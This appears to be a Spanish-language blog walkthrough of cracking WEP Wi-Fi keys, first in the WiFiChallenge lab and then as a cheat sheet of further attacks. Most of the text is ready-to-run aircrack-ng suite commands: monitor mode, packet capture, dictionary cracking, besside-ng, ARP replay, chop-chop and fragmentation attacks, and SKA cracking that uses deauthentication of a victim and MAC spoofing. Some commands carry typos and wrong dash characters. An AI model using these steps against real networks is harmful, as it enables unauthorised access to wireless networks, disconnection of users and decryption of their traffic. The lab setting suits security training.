Hacking Wifi WEP
Introducción WEP
Wired Equivalent Privacy (Privacidad Equivalente a la Conexión por Cable), es un protocolo de seguridad diseñado para proteger las redes inalámbricas. Fue uno de los primeros estándares de seguridad utilizado en redes Wi-Fi, pero se considera obsoleto y se ha vuelto vulnerable a ataques, este protocolo cifra el tráfico con una clave hexadecimal de 64 o 128 bits todo el tráfico se cifra con una única clave.
WEP utiliza un esquema de cifrado de clave compartida, donde todas las estaciones en la red comparten una clave secreta. El problema principal con WEP es que presenta debilidades significativas en su implementación del cifrado, lo que hace que sea relativamente fácil para los atacantes interceptar y descifrar el tráfico de la red. Los ataques a WEP incluyen la recopilación de paquetes y el uso de herramientas como Aircrack-ng para descifrar la clave.
Creando un AP que use el protocolo WEP
En caso de que quieras desplegar el AP tu mismo puedes seguir estos pasos para hacerlo exitosamente https://tonyharris.io/posts/virtual_wifi_lab/ en mi caso estare empleando el AP ya desplegado del WifiChallengev2 https://wifichallengelab.com/
Atacando el protocolo WEP
Bueno lo primero que haremos es poner nuestra antena de red en modo monitor en caso de estar empleando el lab de wifichallenge ya tiene integrada la interfaz asi que solo haremos lo siguiente
Las partes censuradas es por que hay mas usuarios completando el laboratorio para evitar una mala experiencia y meterme en problemas con el creador lo hare de esa forma.
root@WiFiChallengeLab:/home/user/AP# airmon-ng start wlan0
Found 5 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode
PID Name
611 avahi-daemon
614 NetworkManager
633 wpa_supplicant
665 avahi-daemon
945 ifplugd
PHY Interface Driver Chipset
phy0 wlan0 mac80211_hwsim Software simulator of 802.11 radio(s) for mac80211
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
phy1 wlan1 mac80211_hwsim Software simulator of 802.11 radio(s) for mac80211
phy2 wlan2 mac80211_hwsim Software simulator of 802.11 radio(s) for mac80211
phy3 wlan3 mac80211_hwsim Software simulator of 802.11 radio(s) for mac80211
phy4 wlan4 mac80211_hwsim Software simulator of 802.11 radio(s) for mac80211
phy5 wlan5 mac80211_hwsim Software simulator of 802.11 radio(s) for mac80211
phy6 wlan6 mac80211_hwsim Software simulator of 802.11 radio(s) for mac80211
phy60 wlan60 mac80211_hwsim Software simulator of 802.11 radio(s) for mac80211
Ahora matamos los procesos que no nos sirven
root@WiFiChallengeLab:/home/user/AP# airmon-ng check kill
Killing these processes:
PID Name
633 wpa_supplicant
945 ifplugd
406555 avahi-daemon
406769 avahi-daemon
root@WiFiChallengeLab:/home/user/AP#
Una vez hecho esto comenzamos capturando el trafico en este caso vemos que el AP existe y esta operativo
❯ airodump-ng wlan0mon
Y bueno hay un cliente asociado a ese AP vamos a estar capturando paquetes en la columna de Data entre mas tengamos mas probabilidades hay de crackear la contraseña
root@WiFiChallengeLab:/home/user/AP# airodump-ng wlan0mon -c 1 -w captura
Podemos ver que ya hemos recolectado muchos
Una vez paramos el ataque podemos hacer lo siguiente para crackear la contraseña
root@WiFiChallengeLab:/home/user/AP# aircrack-ng captura-01.cap -w /root/wifi-rockyou.txt
En caso de no encontrar la contraseña veras algo como esto Si la contraseña fue encontrada la veras en texto plano
Ahora podemos usar otra herramienta que es besside-ng ya que esta herramienta esta diseñada para encontrar claves WEP solo le pasamos la MAC y el canal en el que opera
root@WiFiChallengeLab:/home/user/AP# besside-ng -c 1 -b F0:9F:C2:AA:19:29 wlan2
Ahora podemos ver la KEY
Mas ataques
Este protocolo esta obsoleto pero aqui te comparto mas ataques
Fake Authentication Attack
❯ airodump-ng –c <Canal_AP> --bssid <BSSID> -w <nombreCaptura> wlan0mon
❯ aireplay-ng -1 0 -a <BSSID> -h <nuestraMAC> -e <ESSID> wlan0mon
❯ aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF –b <BSSID> -h <nuestraMAC> wlan0mon
❯ aircrack-ng –b <BSSID> <archivoPCAP>
ARP Replay Attack
❯ airodump-ng –c <Canal_AP> --bssid <BSSID> -w <nombreCaptura> wlan0mon
❯ aireplay-ng -3 –x 1000 –n 1000 –b <BSSID> -h <nuestraMAC> wlan0mon
❯ aircrack-ng –b <BSSID> <archivoPCAP>
Chop Chop Attack
❯ airodump-ng –c <Canal_AP> --bssid <BSSID> -w <nombreArchivo> wlan0mon
❯ aireplay-ng -1 0 –e <ESSID> -a <BSSID> -h <nuestraMAC> wlan0mon
❯ aireplay-ng -4 –b <BSSID> -h <nuestraMAC> wlan0mon
# Presionamos ‘y’ ;
❯ packetforge-ng -0 –a <BSSID> -h <nuestraMAC> -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
❯ aireplay-ng -2 –r <FileName2> wlan0mon
❯ aircrack-ng <archivoPCAP>
Fragmentation Attack
❯ airodump-ng –c <Canal_AP> --bssid <BSSID> -w <nombreArchivo> wlan0mon
❯aireplay-ng -1 0 –e <ESSID> -a <BSSID> -h <nuestraMAC> wlan0mon
❯aireplay-ng -5 –b<BSSID> -h <nuestraMAC > wlan0mon
# Presionamos ‘y’ ;
❯ packetforge-ng -0 –a <BSSID> -h <nuestraMAC> -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
❯ aireplay-ng -2 –r <FileName2> wlan0mon
❯ aircrack-ng <archivoPCAP>
SKA Type Cracking
❯ airmon-ng start wlan0
❯ airodump-ng –c <Canal_AP> --bssid <BSSID> -w <nombreArchivo> wlan0mon
❯ aireplay-ng -0 10 –a <BSSID> -c <macVictima> wlan0mon
❯ ifconfig wlan0mon down
❯ macchanger –-mac <macVictima> wlan0mon
❯ fconfig wlan0mon up
❯ aireplay-ng -3 –b <BSSID> -h <macFalsa> wlan0mon
❯ aireplay-ng –-deauth 1 –a <BSSID> -h <macFalsa> wlan0mon
❯ ircrack-ng <archivoPCAP>